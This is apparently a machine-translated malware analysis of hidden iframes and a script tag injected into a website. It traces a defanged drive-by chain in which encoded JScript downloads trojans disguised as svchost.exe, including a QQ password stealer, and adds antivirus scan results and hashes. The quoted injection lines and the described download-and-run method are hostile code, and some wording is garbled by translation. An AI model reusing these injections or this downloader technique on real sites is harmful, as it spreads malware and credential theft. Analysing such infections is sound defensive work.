EndurerOriginal
Version 1st
Code added to the webpage of the website:
/------
<IFRAME src = hxxp: // user **. f ** R ** e ** E.7 *** 7169.net/y??j=1=6%%6/xskj.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // user **. f ** R ** e ** E.7 *** 7169.net/yunc*j1_137963793796/kh0.htm width = 0 Height = 0> </iframe> <script language = JavaScript src = hxxp: // Yu *** S * ahi.com/js/test.js> </SCRIPT>
------/
Hxxp: // user **. f ** R ** e ** E.7 *** 7169.net/y*?j=1=6}%%6/xskj.htm
The content is a Javascript script program that uses string. fromcharcode to decrypt the value of variable t and output it.
The variable t is a JScript program, which uses Microsoft. XMLHTTP and SCR accept pting. fileSystemObject: Download The she.exe file and save it as % Temp %/svchost.exe and % Temp %/SVCHOST. vbs, and use shell. use the ShellExecute method of the Application Object Q.
File Description: D:/test/she.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:40:25
Modification time: 12:40:26
Access time:
Size: 21096 bytes, 20.616 KB
MD5: 1fdbf69232ca57bd9f25da-def0b622b
Rising news:Trojan. DL. Direct. et
Scanned file: she.exe-infected |
She.exe-infected by Trojan-Downloader.Win32.Small.dzu
Statistics:
| Known viruses: |
274479 |
Updated: |
27-02-2007 |
| File size (Kb ): |
21 |
Virus bodies: |
1 |
| Files: |
1 |
Warnings: |
0 |
| Archives: |
0 |
Suspicious: |
0 |
She.exe contains the following information: /--- I want to dedicate this message to Gates. Gates, you suck. gatesyou really are homosexual ---/ The file hxxp: // I *****. Th ***** e ***** c.cn/yunc20.j=1%6%%%6/js.exewill be downloaded and saved at: c://js.exe File Description: D:/test/js.exe Attribute: --- Language: English (USA) File version: 5.2.20.0.1830 Description: generic host process for Win32 services Copyright: (c) Microsoft Corporation. All rights reserved. Note: Product Version: 5.2.20.0.1830 Product Name: Microsoft (r) Windows (r) Operating System Company Name: Microsoft Corporation Legal trademark: Internal name: rpcs.exe Source File Name: rpcs.exe Creation Time: 12:55:43 Modification time: 12:54:56 Access time: Size: 237568 bytes, 232.0 KB MD5: 9935611ed73214fd3507ff7669f764 Rising news:Trojan. DL. Inject. Sh |
Scanned file: js.exe-infected |
Js.exe-infected by Trojan-PSW.Win32.QQRob.lp
Statistics:
| Known viruses: |
274479 |
Updated: |
27-02-2007 |
| File size (Kb ): |
232 |
Virus bodies: |
1 |
| Files: |
1 |
Warnings: |
0 |
| Archives: |
0 |
Suspicious: |
0 |
|
Hxxp: // user **. f ** R ** e ** E.7 *** 7169.net/y*?j=1=6}%6/kh0.htm
The webpage cannot be found.
Hxxp: // Yu **** S * ahi.com/js/test.js
The content is:
/------
Document. Write ("<IFRAME src = hxxp: // Yu *** S * ahi.com/js/sas.htm width = 0 Height = 0> </iframe> ")
Document. Write ("<IFRAME src = hxxp: // Yu *** S * ahi.com/js/zj.htm width = 0 Height = 0> </iframe> ")
------/
Hxxp: // Yu **** S * ahi.com/js/sas.htm
The content is the same as hxxp: // user **. f ** R ** e ** E.7 *** 7169.net/y??j=1=6}%6/xskj.htm.
Hxxp: // Yu **** S * ahi.com/js/zj.htm
The webpage cannot be found.